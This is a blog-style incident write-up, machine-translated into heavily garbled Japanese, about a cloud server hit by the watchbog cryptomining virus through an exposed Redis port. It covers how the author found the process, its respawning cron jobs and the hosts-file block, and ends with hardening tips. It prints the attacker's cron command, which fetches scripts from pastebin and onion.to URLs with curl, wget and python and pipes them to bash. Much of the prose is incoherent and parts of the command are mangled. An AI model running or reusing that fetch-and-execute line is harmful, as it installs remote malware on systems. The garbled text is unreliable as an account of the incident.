サーバーはどのように行うためにハッキングされましたか？

先月末、私はそれが再集合したウイルス、月の終了間際に侵入している味サーバにしてみてください。どのように私はあなた自身の赤ちゃんは、あなたは右、ええ、成功するために子供のための方法を見つける必要が同じの外側に打たれたようにそれは感じている、と言うべきです。だから、ウイルスのこの波は戻るが正式に上演逆襲します。##私が危険にさらさサーバーを見つけた方法についての話に良いショーを。それは私の携帯電話は、クラウドアリが警告を受け終わりを求めている、仕事オフ楽しい時間でした。ので、私は物事カード、カードや重慶の私の物事の家の酒を使用する前に、クラウドアリに常にリードは、状況に私のリモートログインサーバーが表示されますと警告しました。今回は、警告メッセージと、常に少し違う、私には少し奇妙なを参照してください。しかし、それはまた、（そこにコマンドラインの電話側を接続するためのツールがありますが、画面が小さすぎるが）私は今、私のMBP、タイムリーな操作で、毎日家に帰ることができない苦しみ、プラス常に前にリモートログインを受け取ることになります彼は、私は継続的なケアを持っていないので、これは、大したことではないだろうと警告しています。私は仕事に来たときに恐ろしい事が翌朝起きました。昨日、警察は、と私はゴードンが上がるしないことを心配していたので、私は巧妙でもアリクラウドサーバー上で、通常のツールとしてのターミナルを開き、通常見られるレベルは、はるかに遅い達成します。しかし、幸いなことに、しばらくの後、最終的には、ログインそれは私が遅い息になり、上がります。しかし、悪いニュースは、私は、コマンドを入力した内容に関係なく、ターミナルエコー速度が耐え難いほど遅いことが判明し、再び来て、私は完全にパニック！一般的にこの問題、またはネットワークの問題という、どちらかのCPUは、しかし、ハンドルにサーバーを引き起こして、いっぱいです。（それは、ウォッチドッグのふりをすることが判明した）私はプロセスがCPUを占有するもの、最後に見て `top`コマンドを使用して、彼女は1と呼ばれるwatchbogを見たように、プロセスは、CPUの99.3％を所有しています！！[]（Https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181313621-1725996431。JPG）私は最後のビットwatchbogがどのようなウイルス、解決のために見ているGoogleにますので、このウイルスは、誰かが、それに遭遇するべきだと思います。インターネットをマイニングすることは、それがウイルスであると述べ、基本的にこのウイルスに感染した狂気のウイルスは、他のサービスが利用できない原因と、鶏のサーバーとなり、鉱業サーバーのCPUリソースを使用することです。長いプロセスとしてとして物語の終わりなので、オンラインチュートリアル、使用私はまだ若すぎるよ証明するために、ウイルス、バックを殺すために `killallをwatchbog`コマンドへの参照を殺すためにと考えるのはナイーブ最初のIで。コマンドを使用して秒のウイルスキル数十を開始 `top`ビューでは、すべてが静かな良いの年、通常のようです。しかし、現実には、暗闇のカバーを沸騰、とかなりすぐに、CPUを表示するには、 `top`コマンドは99％に上昇、またはwatchbogプロセス、それは本当にあなたの叔父やあなたの叔父、認識の孫はまだ認識していることをプロセスました。私はこれはまあ、どのように再び殺すためにどのようになるで、ああ、考えていましたか？私はちょうど最近、ハッカーを考える、のLinuxのcronジョブの少しの知識を学んだが、私のシステムでは、すべてあなたがプロセスを開始している間、私はプロセスを殺すどんなに、それは常に、まだ意志で一回ということは何か、スケジュールされたタスクを作成していません復活。私はいくつかの定期的なタスクの種類、そして案の定がある場合は、サーバーを表示するために `crontabの-l`コマンドを使用しますので、私は再び右のこの時間はそれを得た、ここでハッカーは、タイミングタスクを書いている：` `` bashの* / 9 * * * *（カールFBIとして-fsSL https://pastebin.com/raw/J6NdVBHq||wget -q -O- https://pastebin.com/raw/J6NdVBHq||python -c「インポートurllib2の、プリントfbi.urlopen（「HTTPS ：//pastebin.com/raw/Rs78euic「）.read（）「||カール-fsSL https://pastebin.com/raw/uw00pm39||wget -q -O - https://pastebin.com/raw / uw00pm39 ||カール-fsSLk https://aziplcr72qjhzvin.onion.to/old。TXT || wgetの-q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-チェックインの証明書）| bashの `` `ねえ、あなたは最終的にポニーテールをキャッチし、私はA`を選びましたcrontabの-r`、あなたは少しろくでなしの人生はそれの西に離れて行きます！使用 `crontabの-l`は使用た` killallをwatchbog`再びプロセスを殺すために、定期的な仕事を見つけることができませんでした。私は、あなたが復活方法を確認するには、この時間を考えました。私は密かに喜んでたのと同じように、私は突然、ちょうどまもなく `crontabの入力-l`ボタンが上方向に数回を返すために、スピードとスローダウンのコマンドエコー、プレスをノックが、それはこのように、戻ってきたことがわかったことがわかりました悪魔のスタッフバック！私の神は、タイミング間違った方法を削除することが私の仕事ですか？私は検索のプロセスの特定の使用のcrontabファイルについて、インターネットをチェックして、私は] [:!ので興味深い知識を発見した（Https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181313832 -185948061.jpg）「Linuxでのcrontabに自動的ルーチン事項は、毎分の/ etc / crontab`をA`再読み込み私たちを助けます。」Linuxは私たちが善行を行うことを支援することであるかのように見えますが、それはない場合には妊娠中の善意の人々は、それが悪いことになり、それを使用しています。私はスケジュールされたタスクは無用です削除-r` `crontabファイルを使用するので、ハッカーは、この機能の利点は、おそらくのcrontabで取ります。この線に沿っだから、私は（] [（コマンド・モード入力セットが！行数を示しNU IN）と、ハッカーの流血と暴力を:!見る `の/ etc / crontab`を開くためのvimを使用しHttps://img2018.cnblogs.com /ブログ/ 1330288/201912 / 1330288-20191207181314069-1550661046。ハッカーが実際に千の定期的なタスクよりも多く書いたJPG）、あなたは、単一の手の速度の30年を持っている場合でも、どのくらいの速あなたの手の速度に関係なく、あなたも無力！これまでのところ、私の子供は、ああ、いや、私のサーバーは、実際にそれを保存していませんか？ハードワークを使用すると、タスク固有のコードのタイミングを見れば、あなたはいくつかの手がかりを見つけるだろう、オフに支払っています。以下は、 `/ binに/ httpntp /`コンテンツ内の:! []（Https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181314215-289503594.jpg）であり、あなたは、crontabのタイミング前に設定を見つけることができますやや同様のタスクは、 `pastebin.com` and` aziplcr72qjhzvin.onion.to`が同じである要求に対処することです。我々は一般的な方法ハッカー汚染hostsファイルの前の年の多くを使用しますが、そうもこのアドレスの汚染は、「目には目を、だけでなく、人の体には、」これは、ハッカーのための私の基本的な敬意です。それが再び要求された場合でも、最後の行に/ etc / hostsファイル:!の増加は、[]（Https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181314362-518760697.jpg）ので、マッピングは、ローカルアドレスであります、それと外の世界をカットし、それが壊れて喉を叫んで助けていない場合でも、ちょっと、私はそれを荒廃されるのを待っています。それから私は、上記のタスクを入れて、再びそれを繰り返しコマンドのタイミングを削除するプロセスを強制終了します。最後に、サーバはもはや泣いている、すべてのものは晴天、晴天ではありません！このように、サーバは通常の動作状態に戻ったが、私はすべての後、私のサーバーがどのように侵害されたすべての扇動の背後にある誰クリアされていない、そこに停止しなかったのか？無効デフォルトの22ポートログイン - すべての後、私はまた、保護対策の一定額を行う前に長いです。##トレースしてみましょう、このを見てみましょうhttps://pastebin.com/J6NdVBHqは:! [ペーストビン]（https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181314786-1346914068の背後にある物語です。JPGは）残念ながら、ハッカーが削除されていました。また、私は、これはハッカーがスクリプトをダウンロードする場所であると、スクリプトを保存することができ、実際のWebサイトで、このサイトのビットを使用するようにしてください。そして、そこにhttps://aziplcr72qjhzvin.onion.to/old.txt :! [タマネギ]（https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181315442-74008024.jpg）Aであると思われますダークネットでアクセスするウェブサイトのタマネギのブラウザに。友人が（watchbogプロセスを言ったとhttp://139.99.120.73/を伝えるために、このアドレスにあった、私はこれを訪れ:! [鉱山プール]を、ありますhttps://img2018.cnblogs.com/blog/1330288/201912/1330288これは本当にwatchbogマイニングプログラムであるので、-20191207181315607-1002870383.jpg）これは、実際にはミネラルプールです。アリクラウド警察が報告された前に私たちは一日私を見に戻ってくる:! []（Https://img2018.cnblogs.com/blog/1330288/201912/1330288-20191207181317472-1119100031.jpg）最初のアラーム例外でRedisのは、それが思い出さ資料の冒頭に来るときので、それがあることが判明しました。私はすぐにポートを削除するには、6379でルールのセットaliyun安全を置くので、その後、私は、インターネット検索をチェックし、Redisのは、実際に脆弱性の原因です。しかし、奇妙なことが私に何のニュースはありません警察の後にレポートを与える仕事からでアリの雲が、私はちょうど非常に多くの警告を参照してくださいアリクラウドのコントロールパネルにログインしていることです。あなたはアリ雲のプロダクトマネージャーは、このリマインダー機構の外観を向上させることができますしたい場合は、サーバーは、少なくとも今のユーザーを3回警告し、非常に多くの警告を報告しました。もちろん、主な理由は、自分の中にある、しばしば汚し川の散歩中に、以下の教訓しました。##いくつかの一般的に使用されるソフトウェアにさらされるデフォルトのポートを警戒レッスン1、、それはデフォルトのポートを変更することが最善である; 2、クラウドサーバのデフォルトのSSHポート22、唯一のあなたはポートを知っていることを変更シャットダウン; 3、証明書を使用して最適なログログインパスワードをキャンセルします。>